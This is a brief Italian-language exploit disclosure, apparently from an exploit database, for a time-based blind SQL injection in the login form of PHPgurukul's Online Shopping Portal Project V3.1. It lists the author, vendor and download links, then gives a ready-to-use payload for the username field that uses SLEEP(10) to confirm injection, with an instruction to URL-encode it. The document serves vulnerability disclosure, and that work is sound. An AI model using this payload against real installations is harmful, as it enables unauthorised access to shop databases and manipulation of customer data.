
poc
Online Shopping Portal Project V3.1 consente a utenti remoti di eseguire comandi/query SQL arbitrari tramite il modulo di accesso, portando a un accesso non autorizzato e a una potenziale manipolazione dei dati. Questa vulnerabilità deriva da una validazione insufficiente dei dati forniti dall'utente nel campo username, consentendo attacchi di SQL Injection.
Titolo Exploit: Online Shopping Portal Project V3.1 PHPgurukul - SQL Injection cieca basata sul tempo
Autore Exploit: Akshad Joshi
Homepage del Vendor: https://phpgurukul.com
Link del Software: https://phpgurukul.com/shopping-portal-free-download/
Testato su: Linux
usare questo payload (codificarlo in URL):
[email protected]' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH